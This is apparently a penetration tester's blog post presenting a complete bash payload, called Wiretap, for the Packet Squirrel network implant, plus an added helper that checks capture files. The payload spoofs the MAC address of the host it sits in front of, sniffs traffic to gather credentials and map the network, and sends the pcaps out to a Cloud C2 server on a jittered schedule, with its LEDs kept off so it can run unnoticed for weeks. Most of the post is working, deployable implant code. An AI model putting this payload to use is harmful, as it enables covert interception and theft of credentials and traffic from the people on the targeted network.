Automated Long Haul Packet Squirrel PCAP Exfiltration

Fire and forget script for the Packet Squirrel to exfiltrate PCAPs to Cloud C2

The Packet Squirrel is a versatile network implant. One of its most common uses is to sniff network traffic to pcap, which is an effective way to gather credentials, identify hosts, domain controllers and the protocols in use, and perform other network reconnaissance and packet analysis. However, the default tcpdump payload stores the pcaps on the device itself, so recovering them requires physically retrieving the implanted Packet Squirrel from the target site.

This is far from ideal during a physical penetration test: you must re-enter the site to recover the device, which makes it of little use as a long-haul implant. To solve this problem I wrote a payload that automatically exfiltrates a set number of pcap files to Cloud C2 at a given interval. After each round of exfiltration the pcaps are archived, compressed, saved to USB and rotated out of the capture directory. This allows the Packet Squirrel to be deployed and left on site for long periods without anyone having to re-enter the site to recover it.

All you need to do is set the sleep interval and the number of pcaps to exfiltrate per round, adjust the default jitter range if you prefer something shorter, and copy the payload to the switch1 folder; the device does the rest. NETMODE is set to CLONE, which takes the MAC address of the MITM'd host on the Ethernet In (eth0) port and spoofs it on the Ethernet Out (eth1) port, so the implant's own traffic appears to come from that host.


Pseudo Code Flow Diagram


payload.sh

#!/bin/bash
#
# Title:        Wiretap
# Description:  Sets the NETMODE to CLONE for opsec, sniffs traffic,
#               and exfiltrates a set number of PCAPs to Cloud C2 at a given interval.
#               PCAPs are archived and rotated after each round of exfiltration.
# Author:       Shain Lakin
# Version:      1.0
# Category:     sniffing, exfiltration
# Target:       Any
# Net Mode:     CLONE
# LED loop:     LEDs are off by default, uncomment for debugging
#               Solid Yellow; tcpdump running
#               Flashing Magenta; exfiltrating pcap
#               Flashing Red; killing tcpdump
#               White Solid; archiving pcaps and sleeping


# Seconds to sleep between rounds, plus a random jitter of
# jitter_min .. jitter_min+jitter_range seconds drawn fresh for every round.
interval=3600
# Number of pcap files (2 MB each, see -C below) to exfiltrate per round.
num_exfils=100
mode=CLONE
jitter_min=30
jitter_range=600

lootdir=/mnt/loot/tcpdump
archdir=/mnt/loot/archive


# Size of a file in bytes, or 0 if it does not exist yet.
function fsize() {
	stat -c %s "$1" 2>/dev/null || echo 0
}


function jitter() {
	echo $((jitter_min + RANDOM % jitter_range))
}


function rotate() {
	#LED W SOLID
	# Archive everything left in the capture directory (including the partial
	# file tcpdump was writing when it was killed), then clear it for the next round.
	mkdir -p "$archdir" &>/dev/null
	tar -czf "$archdir/archive-$1.tar.gz" "$lootdir/" &>/dev/null
	rm -f "$lootdir"/dump*
	sleep $((interval + $(jitter)))
}


function finish() {
	#LED R FAST
	kill "$1"
	wait "$1"
	sync
	sleep 1
}


function sniff() {
	local fname tpid c cur next

	fname=dump_$(date +%Y-%m-%d-%H-%M).pcap
	mkdir -p "$lootdir" &>/dev/null
	# -C 2 rotates the savefile every 2,000,000 bytes, naming the files
	# $fname, ${fname}1, ${fname}2, ...; -z sync flushes each closed file to disk.
	tcpdump -i eth0 -w "$lootdir/$fname" -C 2 -z sync &>/dev/null &
	tpid=$!
	sleep 5

	c=0

	while [[ $c -lt $num_exfils ]]
	do
		#LED ATTACK
		LED OFF

		if [[ $c -eq 0 ]]
		then
			cur=$lootdir/$fname
		else
			cur=$lootdir/$fname$c
		fi
		next=$lootdir/$fname$((c + 1))

		# tcpdump opens the next file only after closing the current one, so
		# waiting for $next guarantees $cur is complete and no longer being
		# written; the size check keeps the 2 MB minimum before exfiltration.
		while [[ ! -e $next || $(fsize "$cur") -lt 2000000 ]]; do sleep 1; done

		sync
		if [[ $c -eq 0 ]]
		then
			sleep $((10 + RANDOM % 30))
		else
			sleep $((5 + RANDOM % 10))
		fi
		#LED M SUCCESS
		C2EXFIL "$cur"

		((c++))
	done

	finish "$tpid"
	rotate "$fname"
}


[[ ! -f /mnt/NO_MOUNT ]] && {
	NETMODE $mode
	sleep 30
	C2CONNECT
	# Capture, exfiltrate, archive, sleep, repeat. A loop rather than calling
	# sniff recursively, so the implant can run for weeks without the call
	# depth growing every round.
	while true
	do
		sniff
	done
} || {
	LED FAIL
}
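The payload above decides that a rotated capture is ready to exfiltrate by watching its size. The following is an added example, not part of the Wiretap payload or of Hak5's tooling, showing a stricter stand-alone check an operator can drop in before C2EXFIL: it waits for tcpdump to have opened the next file (which only happens after the current one is closed), confirms the file exceeds the -C limit (tcpdump rotates only once a file is larger than limit * 1,000,000 bytes), and confirms the first four bytes are a pcap or pcapng magic number. It assumes only tcpdump's -C naming scheme (name, name1, name2, ...); the function names are this example's own.

```bash
#!/bin/bash
# Added example: verify a tcpdump -C savefile before exfiltrating it.
# Not part of the Wiretap payload; function names are this example's own.

# Name of the n-th savefile (n >= 0) tcpdump writes for base name $1 with -C.
rotated_name() {
    if [ "$2" -eq 0 ]; then printf '%s\n' "$1"; else printf '%s%s\n' "$1" "$2"; fi
}

# Size in bytes, or 0 if the file does not exist yet.
fsize() {
    stat -c %s "$1" 2>/dev/null || echo 0
}

# Succeeds if the first four bytes are a pcap magic number (either byte
# order, microsecond or nanosecond timestamps) or the pcapng block type.
pcap_magic_ok() {
    local magic
    magic=$(od -An -tx1 -N4 "$1" 2>/dev/null | tr -d ' \n')
    case "$magic" in
        a1b2c3d4|d4c3b2a1|a1b23c4d|4d3cb2a1|0a0d0d0a) return 0 ;;
        *) return 1 ;;
    esac
}

# Succeeds once savefile number $2 of base name $1 (captured with -C $3) is
# safe to exfiltrate: tcpdump has already opened the following file, so this
# one is closed; it is larger than the -C limit; and it starts with a
# capture-file magic number rather than garbage.
rotated_file_complete() {
    local base=$1 n=$2 limit_mb=$3
    local cur next
    cur=$(rotated_name "$base" "$n")
    next=$(rotated_name "$base" $((n + 1)))
    [ -e "$next" ] &&
        [ "$(fsize "$cur")" -gt $((limit_mb * 1000000)) ] &&
        pcap_magic_ok "$cur"
}
```

In the payload's loop this replaces the size-only wait with `until rotated_file_complete "$lootdir/$fname" "$c" 2; do sleep 1; done`. The last file of a round never passes this check because tcpdump is killed before it rotates; that file is still picked up by the tar archive in rotate, so nothing is lost.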
******
Written by Shain Lakin on 09 October 2023